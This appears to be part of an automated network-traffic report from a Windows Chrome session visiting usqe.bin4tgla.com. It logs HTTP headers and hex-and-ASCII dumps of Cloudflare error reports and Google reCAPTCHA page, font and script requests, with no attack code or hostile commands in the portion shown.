                                                                                                                                                                                                                                                                  Date: Tue, 29 Oct 2024 19:10:02 GMT
                                                                                                                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                  Cache-Control: max-age=14400
                                                                                                                                                                                                                                                                  Age: 10140
                                                                                                                                                                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=sMPDIxYmm%2Frw3mK%2BHL72fQptt8lqq7Mtf6Z6LYahGd3TkQRJ8KUB7RswbOowqO1WCGd%2FyVGaqhgixMgzAoX4JMMSOWYS385qLXizPVu1FRLnBIJsiD8jfSe6NeMM4w%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                                                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=22828&sent=244&recv=103&lost=0&retrans=0&sent_bytes=286315&recv_bytes=19389&delivery_rate=2104196&cwnd=229&unsent_bytes=0&cid=86849e3f6c99b7dd&ts=791534&x=0"
                                                                                                                                                                                                                                                                  CF-Cache-Status: HIT
                                                                                                                                                                                                                                                                  Server: cloudflare
                                                                                                                                                                                                                                                                  CF-RAY: 8da576a10ca92877-DFW
                                                                                                                                                                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1313&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2827&recv_bytes=1900&delivery_rate=2002766&cwnd=251&unsent_bytes=0&cid=556e3a53c114fab6&ts=5860&x=0"
                                                                                                                                                                                                                                                                  2024-10-29 19:10:02 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                  Data Ascii: 0


                                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                  51192.168.2.164976735.190.80.14437056C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                  2024-10-29 19:10:03 UTC536OUTOPTIONS /report/v4?s=sMPDIxYmm%2Frw3mK%2BHL72fQptt8lqq7Mtf6Z6LYahGd3TkQRJ8KUB7RswbOowqO1WCGd%2FyVGaqhgixMgzAoX4JMMSOWYS385qLXizPVu1FRLnBIJsiD8jfSe6NeMM4w%3D%3D HTTP/1.1
                                                                                                                                                                                                                                                                  Host: a.nel.cloudflare.com
                                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                                  Origin: https://usqe.bin4tgla.com
                                                                                                                                                                                                                                                                  Access-Control-Request-Method: POST
                                                                                                                                                                                                                                                                  Access-Control-Request-Headers: content-type
                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                  2024-10-29 19:10:03 UTC336INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                  Content-Length: 0
                                                                                                                                                                                                                                                                  access-control-max-age: 86400
                                                                                                                                                                                                                                                                  access-control-allow-methods: POST, OPTIONS
                                                                                                                                                                                                                                                                  access-control-allow-origin: *
                                                                                                                                                                                                                                                                  access-control-allow-headers: content-length, content-type
                                                                                                                                                                                                                                                                  date: Tue, 29 Oct 2024 19:10:03 GMT
                                                                                                                                                                                                                                                                  Via: 1.1 google
                                                                                                                                                                                                                                                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                                  Connection: close


                                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                  52192.168.2.1649766142.250.186.684437056C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                  2024-10-29 19:10:03 UTC945OUTGET /recaptcha/api2/anchor?ar=1&k=6LfT61wqAAAAAOLaMTaK9Ln8bjdWJ8-ahQ3zE9AF&co=aHR0cHM6Ly91c3FlLmJpbjR0Z2xhLmNvbTo0NDM.&hl=en&v=-ZG7BC9TxCVEbzIO2m429usb&size=normal&cb=5a6ztk5kgw7u HTTP/1.1
                                                                                                                                                                                                                                                                  Host: www.google.com
                                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                  sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                  sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                  Upgrade-Insecure-Requests: 1
                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                                                                                                                  X-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIkqHLAQj2mM0BCIWgzQEIucrNAQiJ080BGMvYzQEY642lFw==
                                                                                                                                                                                                                                                                  Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                  Sec-Fetch-Mode: navigate
                                                                                                                                                                                                                                                                  Sec-Fetch-Dest: iframe
                                                                                                                                                                                                                                                                  Referer: https://usqe.bin4tgla.com/
                                                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                  2024-10-29 19:10:03 UTC1161INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                  Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                                                  Cross-Origin-Resource-Policy: cross-origin
                                                                                                                                                                                                                                                                  Cross-Origin-Embedder-Policy: require-corp
                                                                                                                                                                                                                                                                  Report-To: {"group":"recaptcha","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/recaptcha"}]}
                                                                                                                                                                                                                                                                  Report-To: {"group":"coop_38fac9d5b82543fc4729580d18ff2d3d","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/38fac9d5b82543fc4729580d18ff2d3d"}]}
                                                                                                                                                                                                                                                                  Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                                                                                                                  Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                                                                                                  Date: Tue, 29 Oct 2024 19:10:03 GMT
                                                                                                                                                                                                                                                                  Content-Security-Policy: script-src 'report-sample' 'nonce-6wlIMzqjaZ24XqbDl-on0g' 'unsafe-inline' 'strict-dynamic' https: http: 'unsafe-eval';object-src 'none';base-uri 'self';report-uri https://csp.withgoogle.com/csp/recaptcha/1
                                                                                                                                                                                                                                                                  Cross-Origin-Opener-Policy-Report-Only: same-origin; report-to="coop_38fac9d5b82543fc4729580d18ff2d3d"
                                                                                                                                                                                                                                                                  Server: ESF
                                                                                                                                                                                                                                                                  X-XSS-Protection: 0
                                                                                                                                                                                                                                                                  X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                                  Accept-Ranges: none
                                                                                                                                                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                  2024-10-29 19:10:03 UTC217INData Raw: 35 37 63 64 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 3c 68 74 6d 6c 20 64 69 72 3d 22 6c 74 72 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0a 3c 74 69 74 6c 65 3e 72 65 43 41 50 54 43 48 41 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74
                                                                                                                                                                                                                                                                  Data Ascii: 57cd<!DOCTYPE HTML><html dir="ltr" lang="en"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><title>reCAPTCHA</title><style type="text
                                                                                                                                                                                                                                                                  2024-10-29 19:10:03 UTC1378INData Raw: 2f 63 73 73 22 3e 0a 2f 2a 20 63 79 72 69 6c 6c 69 63 2d 65 78 74 20 2a 2f 0a 40 66 6f 6e 74 2d 66 61 63 65 20 7b 0a 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 27 52 6f 62 6f 74 6f 27 3b 0a 20 20 66 6f 6e 74 2d 73 74 79 6c 65 3a 20 6e 6f 72 6d 61 6c 3b 0a 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 34 30 30 3b 0a 20 20 73 72 63 3a 20 75 72 6c 28 2f 2f 66 6f 6e 74 73 2e 67 73 74 61 74 69 63 2e 63 6f 6d 2f 73 2f 72 6f 62 6f 74 6f 2f 76 31 38 2f 4b 46 4f 6d 43 6e 71 45 75 39 32 46 72 31 4d 75 37 32 78 4b 4f 7a 59 2e 77 6f 66 66 32 29 20 66 6f 72 6d 61 74 28 27 77 6f 66 66 32 27 29 3b 0a 20 20 75 6e 69 63 6f 64 65 2d 72 61 6e 67 65 3a 20 55 2b 30 34 36 30 2d 30 35 32 46 2c 20 55 2b 31 43 38 30 2d 31 43 38 41 2c 20 55 2b 32 30 42 34 2c 20 55 2b 32 44 45 30
                                                                                                                                                                                                                                                                  Data Ascii: /css">/* cyrillic-ext */@font-face { font-family: 'Roboto'; font-style: normal; font-weight: 400; src: url(//fonts.gstatic.com/s/roboto/v18/KFOmCnqEu92Fr1Mu72xKOzY.woff2) format('woff2'); unicode-range: U+0460-052F, U+1C80-1C8A, U+20B4, U+2DE0
                                                                                                                                                                                                                                                                  2024-10-29 19:10:03 UTC1378INData Raw: 55 2b 30 33 32 39 2c 20 55 2b 31 45 41 30 2d 31 45 46 39 2c 20 55 2b 32 30 41 42 3b 0a 7d 0a 2f 2a 20 6c 61 74 69 6e 2d 65 78 74 20 2a 2f 0a 40 66 6f 6e 74 2d 66 61 63 65 20 7b 0a 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 27 52 6f 62 6f 74 6f 27 3b 0a 20 20 66 6f 6e 74 2d 73 74 79 6c 65 3a 20 6e 6f 72 6d 61 6c 3b 0a 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 34 30 30 3b 0a 20 20 73 72 63 3a 20 75 72 6c 28 2f 2f 66 6f 6e 74 73 2e 67 73 74 61 74 69 63 2e 63 6f 6d 2f 73 2f 72 6f 62 6f 74 6f 2f 76 31 38 2f 4b 46 4f 6d 43 6e 71 45 75 39 32 46 72 31 4d 75 37 47 78 4b 4f 7a 59 2e 77 6f 66 66 32 29 20 66 6f 72 6d 61 74 28 27 77 6f 66 66 32 27 29 3b 0a 20 20 75 6e 69 63 6f 64 65 2d 72 61 6e 67 65 3a 20 55 2b 30 31 30 30 2d 30 32 42 41 2c 20 55 2b 30 32 42 44
                                                                                                                                                                                                                                                                  Data Ascii: U+0329, U+1EA0-1EF9, U+20AB;}/* latin-ext */@font-face { font-family: 'Roboto'; font-style: normal; font-weight: 400; src: url(//fonts.gstatic.com/s/roboto/v18/KFOmCnqEu92Fr1Mu7GxKOzY.woff2) format('woff2'); unicode-range: U+0100-02BA, U+02BD
                                                                                                                                                                                                                                                                  2024-10-29 19:10:03 UTC1378INData Raw: 74 2d 66 61 63 65 20 7b 0a 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 27 52 6f 62 6f 74 6f 27 3b 0a 20 20 66 6f 6e 74 2d 73 74 79 6c 65 3a 20 6e 6f 72 6d 61 6c 3b 0a 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 35 30 30 3b 0a 20 20 73 72 63 3a 20 75 72 6c 28 2f 2f 66 6f 6e 74 73 2e 67 73 74 61 74 69 63 2e 63 6f 6d 2f 73 2f 72 6f 62 6f 74 6f 2f 76 31 38 2f 4b 46 4f 6c 43 6e 71 45 75 39 32 46 72 31 4d 6d 45 55 39 66 43 42 63 34 45 73 41 2e 77 6f 66 66 32 29 20 66 6f 72 6d 61 74 28 27 77 6f 66 66 32 27 29 3b 0a 20 20 75 6e 69 63 6f 64 65 2d 72 61 6e 67 65 3a 20 55 2b 31 46 30 30 2d 31 46 46 46 3b 0a 7d 0a 2f 2a 20 67 72 65 65 6b 20 2a 2f 0a 40 66 6f 6e 74 2d 66 61 63 65 20 7b 0a 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 27 52 6f 62 6f 74 6f 27 3b 0a 20
                                                                                                                                                                                                                                                                  Data Ascii: t-face { font-family: 'Roboto'; font-style: normal; font-weight: 500; src: url(//fonts.gstatic.com/s/roboto/v18/KFOlCnqEu92Fr1MmEU9fCBc4EsA.woff2) format('woff2'); unicode-range: U+1F00-1FFF;}/* greek */@font-face { font-family: 'Roboto';
                                                                                                                                                                                                                                                                  2024-10-29 19:10:03 UTC1378INData Raw: 6d 2f 73 2f 72 6f 62 6f 74 6f 2f 76 31 38 2f 4b 46 4f 6c 43 6e 71 45 75 39 32 46 72 31 4d 6d 45 55 39 66 42 42 63 34 2e 77 6f 66 66 32 29 20 66 6f 72 6d 61 74 28 27 77 6f 66 66 32 27 29 3b 0a 20 20 75 6e 69 63 6f 64 65 2d 72 61 6e 67 65 3a 20 55 2b 30 30 30 30 2d 30 30 46 46 2c 20 55 2b 30 31 33 31 2c 20 55 2b 30 31 35 32 2d 30 31 35 33 2c 20 55 2b 30 32 42 42 2d 30 32 42 43 2c 20 55 2b 30 32 43 36 2c 20 55 2b 30 32 44 41 2c 20 55 2b 30 32 44 43 2c 20 55 2b 30 33 30 34 2c 20 55 2b 30 33 30 38 2c 20 55 2b 30 33 32 39 2c 20 55 2b 32 30 30 30 2d 32 30 36 46 2c 20 55 2b 32 30 41 43 2c 20 55 2b 32 31 32 32 2c 20 55 2b 32 31 39 31 2c 20 55 2b 32 31 39 33 2c 20 55 2b 32 32 31 32 2c 20 55 2b 32 32 31 35 2c 20 55 2b 46 45 46 46 2c 20 55 2b 46 46 46 44 3b 0a 7d 0a
                                                                                                                                                                                                                                                                  Data Ascii: m/s/roboto/v18/KFOlCnqEu92Fr1MmEU9fBBc4.woff2) format('woff2'); unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;}
                                                                                                                                                                                                                                                                  2024-10-29 19:10:03 UTC1378INData Raw: 3a 20 6e 6f 72 6d 61 6c 3b 0a 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 39 30 30 3b 0a 20 20 73 72 63 3a 20 75 72 6c 28 2f 2f 66 6f 6e 74 73 2e 67 73 74 61 74 69 63 2e 63 6f 6d 2f 73 2f 72 6f 62 6f 74 6f 2f 76 31 38 2f 4b 46 4f 6c 43 6e 71 45 75 39 32 46 72 31 4d 6d 59 55 74 66 43 78 63 34 45 73 41 2e 77 6f 66 66 32 29 20 66 6f 72 6d 61 74 28 27 77 6f 66 66 32 27 29 3b 0a 20 20 75 6e 69 63 6f 64 65 2d 72 61 6e 67 65 3a 20 55 2b 30 31 30 32 2d 30 31 30 33 2c 20 55 2b 30 31 31 30 2d 30 31 31 31 2c 20 55 2b 30 31 32 38 2d 30 31 32 39 2c 20 55 2b 30 31 36 38 2d 30 31 36 39 2c 20 55 2b 30 31 41 30 2d 30 31 41 31 2c 20 55 2b 30 31 41 46 2d 30 31 42 30 2c 20 55 2b 30 33 30 30 2d 30 33 30 31 2c 20 55 2b 30 33 30 33 2d 30 33 30 34 2c 20 55 2b 30 33 30 38 2d 30
                                                                                                                                                                                                                                                                  Data Ascii: : normal; font-weight: 900; src: url(//fonts.gstatic.com/s/roboto/v18/KFOlCnqEu92Fr1MmYUtfCxc4EsA.woff2) format('woff2'); unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+0300-0301, U+0303-0304, U+0308-0
                                                                                                                                                                                                                                                                  2024-10-29 19:10:03 UTC1378INData Raw: 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 73 74 61 74 69 63 2e 63 6f 6d 2f 72 65 63 61 70 74 63 68 61 2f 72 65 6c 65 61 73 65 73 2f 2d 5a 47 37 42 43 39 54 78 43 56 45 62 7a 49 4f 32 6d 34 32 39 75 73 62 2f 72 65 63 61 70 74 63 68 61 5f 5f 65 6e 2e 6a 73 22 20 6e 6f 6e 63 65 3d 22 36 77 6c 49 4d 7a 71 6a 61 5a 32 34 58 71 62 44 6c 2d 6f 6e 30 67 22 3e 0a 20 20 20 20 20 20 0a 20 20 20 20 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 3c 64 69 76 20 69 64 3d 22 72 63 2d 61 6e 63 68 6f 72 2d 61 6c 65 72 74 22 20 63 6c 61 73 73 3d 22 72 63 2d 61 6e 63 68 6f 72 2d 61 6c 65 72 74 22 3e 3c 2f 64 69 76 3e 0a 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 68 69 64 64 65 6e 22 20 69 64 3d
                                                                                                                                                                                                                                                                  Data Ascii: text/javascript" src="https://www.gstatic.com/recaptcha/releases/-ZG7BC9TxCVEbzIO2m429usb/recaptcha__en.js" nonce="6wlIMzqjaZ24XqbDl-on0g"> </script></head><body><div id="rc-anchor-alert" class="rc-anchor-alert"></div><input type="hidden" id=
                                                                                                                                                                                                                                                                  2024-10-29 19:10:03 UTC1378INData Raw: 48 69 5a 66 37 69 67 78 6d 6f 67 39 33 6b 6d 4d 78 78 38 41 75 78 5a 5a 30 4f 6c 54 69 38 33 4e 65 70 4b 43 30 71 43 39 62 51 35 78 4a 42 43 36 42 61 2d 61 38 37 4c 41 76 59 52 46 54 45 74 79 6c 37 6b 46 42 75 46 76 55 59 71 6f 74 41 63 50 45 5f 51 38 64 39 5f 51 79 4e 58 33 66 56 65 77 53 65 66 43 2d 79 79 36 31 67 72 51 74 4d 59 54 56 42 65 55 77 5f 47 47 53 59 44 50 6c 61 68 69 41 56 56 77 2d 50 5f 4a 6a 50 56 6b 2d 48 4c 33 32 58 33 41 50 67 34 42 6b 4f 51 34 31 33 5a 74 67 63 73 38 39 75 4e 49 31 6f 52 73 56 77 43 41 64 36 55 49 4d 76 75 71 4c 46 34 4d 70 6a 61 75 4a 41 33 59 30 72 61 42 31 7a 7a 37 42 46 61 39 77 61 43 67 5f 4e 42 63 4c 4c 32 6c 6a 45 6e 42 65 32 76 50 34 68 6f 65 61 74 52 4a 66 72 71 61 43 68 78 50 39 47 5f 36 38 48 41 4e 31 71 34
                                                                                                                                                                                                                                                                  Data Ascii: HiZf7igxmog93kmMxx8AuxZZ0OlTi83NepKC0qC9bQ5xJBC6Ba-a87LAvYRFTEtyl7kFBuFvUYqotAcPE_Q8d9_QyNX3fVewSefC-yy61grQtMYTVBeUw_GGSYDPlahiAVVw-P_JjPVk-HL32X3APg4BkOQ413Ztgcs89uNI1oRsVwCAd6UIMvuqLF4MpjauJA3Y0raB1zz7BFa9waCg_NBcLL2ljEnBe2vP4hoeatRJfrqaChxP9G_68HAN1q4
                                                                                                                                                                                                                                                                  2024-10-29 19:10:03 UTC1378INData Raw: 33 42 33 56 47 31 4c 63 55 56 69 4d 58 68 46 56 45 70 76 55 45 39 6c 4f 44 52 51 51 57 70 75 64 46 6c 4a 56 56 4d 72 4f 57 6c 49 64 47 56 4d 5a 6c 68 30 54 33 56 51 56 55 39 4a 4f 56 5a 6b 64 30 74 36 52 46 64 79 64 6a 4e 48 5a 48 6c 6a 61 48 64 52 55 7a 4a 77 51 6b 6b 77 55 7a 4a 54 54 45 56 54 64 6d 31 32 62 6a 4e 72 64 48 6c 36 4e 55 30 78 65 54 67 78 63 6c 64 53 51 30 68 33 59 6e 45 34 57 48 6c 53 4e 33 42 36 56 30 31 46 4d 54 46 45 64 47 38 72 63 6b 38 76 52 6d 56 73 53 47 78 36 64 6b 35 42 4b 33 6c 7a 4e 6e 68 6a 55 32 4d 72 54 33 52 75 4e 6b 34 34 4d 6b 35 73 52 47 6f 30 4d 6d 78 4f 64 33 52 74 57 54 41 33 4d 56 5a 61 54 6b 68 33 56 56 46 56 57 57 35 4b 63 46 46 71 63 6a 41 79 5a 6e 6c 46 56 53 74 6c 51 56 4d 33 4c 32 64 6f 53 55 74 4c 61 32 4e 70
                                                                                                                                                                                                                                                                  Data Ascii: 3B3VG1LcUViMXhFVEpvUE9lODRQQWpudFlJVVMrOWlIdGVMZlh0T3VQVU9JOVZkd0t6RFdydjNHZHljaHdRUzJwQkkwUzJTTEVTdm12bjNrdHl6NU0xeTgxcldSQ0h3YnE4WHlSN3B6V01FMTFEdG8rck8vRmVsSGx6dk5BK3lzNnhjU2MrT3RuNk44Mk5sRGo0MmxOd3RtWTA3MVZaTkh3VVFVWW5KcFFqcjAyZnlFVStlQVM3L2doSUtLa2Np
                                                                                                                                                                                                                                                                  2024-10-29 19:10:03 UTC1378INData Raw: 58 62 56 46 78 56 55 45 31 56 54 56 75 4d 55 5a 73 4b 30 78 53 5a 31 4e 56 5a 47 70 78 51 30 46 52 62 6d 46 52 65 47 68 45 63 79 74 55 63 48 4a 34 51 30 78 6e 5a 6b 4d 35 4e 44 56 73 61 6c 6b 32 64 69 74 6b 4d 55 74 36 62 46 6c 61 5a 6c 5a 68 4f 58 56 79 53 56 52 59 4f 55 31 6b 51 58 67 35 63 47 5a 33 52 55 52 58 55 31 6f 34 65 47 74 4b 4e 46 42 74 63 6c 46 44 51 58 68 53 4e 48 55 31 63 32 56 79 4d 44 5a 45 5a 47 78 6a 4d 46 70 56 4f 57 46 52 5a 54 49 79 62 58 4e 45 56 55 30 79 55 6a 52 4b 59 6d 35 6a 56 31 68 46 63 6b 52 69 57 6b 31 56 63 6c 55 77 64 45 52 6a 64 6a 52 54 61 32 64 48 63 6c 59 76 54 56 5a 78 52 56 52 75 4e 45 78 42 64 79 74 59 63 55 6b 77 53 30 39 56 55 7a 51 78 61 32 4e 31 62 31 4e 54 4d 45 46 6b 64 6a 52 4b 63 6b 46 79 53 7a 5a 4d 55 47
                                                                                                                                                                                                                                                                  Data Ascii: XbVFxVUE1VTVuMUZsK0xSZ1NVZGpxQ0FRbmFReGhEcytUcHJ4Q0xnZkM5NDVsalk2ditkMUt6bFlaZlZhOXVySVRYOU1kQXg5cGZ3RURXU1o4eGtKNFBtclFDQXhSNHU1c2VyMDZEZGxjMFpVOWFRZTIybXNEVU0yUjRKYm5jV1hFckRiWk1VclUwdERjdjRTa2dHclYvTVZxRVRuNExBdytYcUkwS09VUzQxa2N1b1NTMEFkdjRKckFySzZMUG


                                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                  53192.168.2.164976935.190.80.14437056C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                  2024-10-29 19:10:03 UTC476OUTPOST /report/v4?s=sMPDIxYmm%2Frw3mK%2BHL72fQptt8lqq7Mtf6Z6LYahGd3TkQRJ8KUB7RswbOowqO1WCGd%2FyVGaqhgixMgzAoX4JMMSOWYS385qLXizPVu1FRLnBIJsiD8jfSe6NeMM4w%3D%3D HTTP/1.1
                                                                                                                                                                                                                                                                  Host: a.nel.cloudflare.com
                                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                                  Content-Length: 432
                                                                                                                                                                                                                                                                  Content-Type: application/reports+json
                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                  2024-10-29 19:10:03 UTC432OUTData Raw: 5b 7b 22 61 67 65 22 3a 30 2c 22 62 6f 64 79 22 3a 7b 22 65 6c 61 70 73 65 64 5f 74 69 6d 65 22 3a 31 34 36 2c 22 6d 65 74 68 6f 64 22 3a 22 47 45 54 22 2c 22 70 68 61 73 65 22 3a 22 61 70 70 6c 69 63 61 74 69 6f 6e 22 2c 22 70 72 6f 74 6f 63 6f 6c 22 3a 22 68 74 74 70 2f 31 2e 31 22 2c 22 72 65 66 65 72 72 65 72 22 3a 22 68 74 74 70 73 3a 2f 2f 75 73 71 65 2e 62 69 6e 34 74 67 6c 61 2e 63 6f 6d 2f 66 70 49 32 47 67 71 6c 2f 22 2c 22 73 61 6d 70 6c 69 6e 67 5f 66 72 61 63 74 69 6f 6e 22 3a 31 2e 30 2c 22 73 65 72 76 65 72 5f 69 70 22 3a 22 31 30 34 2e 32 31 2e 38 35 2e 39 32 22 2c 22 73 74 61 74 75 73 5f 63 6f 64 65 22 3a 34 30 34 2c 22 74 79 70 65 22 3a 22 68 74 74 70 2e 65 72 72 6f 72 22 7d 2c 22 74 79 70 65 22 3a 22 6e 65 74 77 6f 72 6b 2d 65 72 72 6f
                                                                                                                                                                                                                                                                  Data Ascii: [{"age":0,"body":{"elapsed_time":146,"method":"GET","phase":"application","protocol":"http/1.1","referrer":"https://usqe.bin4tgla.com/fpI2Ggql/","sampling_fraction":1.0,"server_ip":"104.21.85.92","status_code":404,"type":"http.error"},"type":"network-erro
                                                                                                                                                                                                                                                                  2024-10-29 19:10:04 UTC168INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                  Content-Length: 0
                                                                                                                                                                                                                                                                  date: Tue, 29 Oct 2024 19:10:03 GMT
                                                                                                                                                                                                                                                                  Via: 1.1 google
                                                                                                                                                                                                                                                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                                  Connection: close


                                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                  54192.168.2.1649773142.250.186.684437056C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                  2024-10-29 19:10:08 UTC844OUTGET /recaptcha/api2/webworker.js?hl=en&v=-ZG7BC9TxCVEbzIO2m429usb HTTP/1.1
                                                                                                                                                                                                                                                                  Host: www.google.com
                                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                  sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                  sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                  Accept: */*
                                                                                                                                                                                                                                                                  X-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIkqHLAQj2mM0BCIWgzQEIucrNAQiJ080BGMvYzQEY642lFw==
                                                                                                                                                                                                                                                                  Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                                                  Sec-Fetch-Mode: same-origin
                                                                                                                                                                                                                                                                  Sec-Fetch-Dest: worker
                                                                                                                                                                                                                                                                  Referer: https://www.google.com/recaptcha/api2/anchor?ar=1&k=6LfT61wqAAAAAOLaMTaK9Ln8bjdWJ8-ahQ3zE9AF&co=aHR0cHM6Ly91c3FlLmJpbjR0Z2xhLmNvbTo0NDM.&hl=en&v=-ZG7BC9TxCVEbzIO2m429usb&size=normal&cb=5a6ztk5kgw7u
                                                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                  2024-10-29 19:10:08 UTC917INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                  Content-Type: text/javascript; charset=utf-8
                                                                                                                                                                                                                                                                  Cross-Origin-Embedder-Policy: require-corp
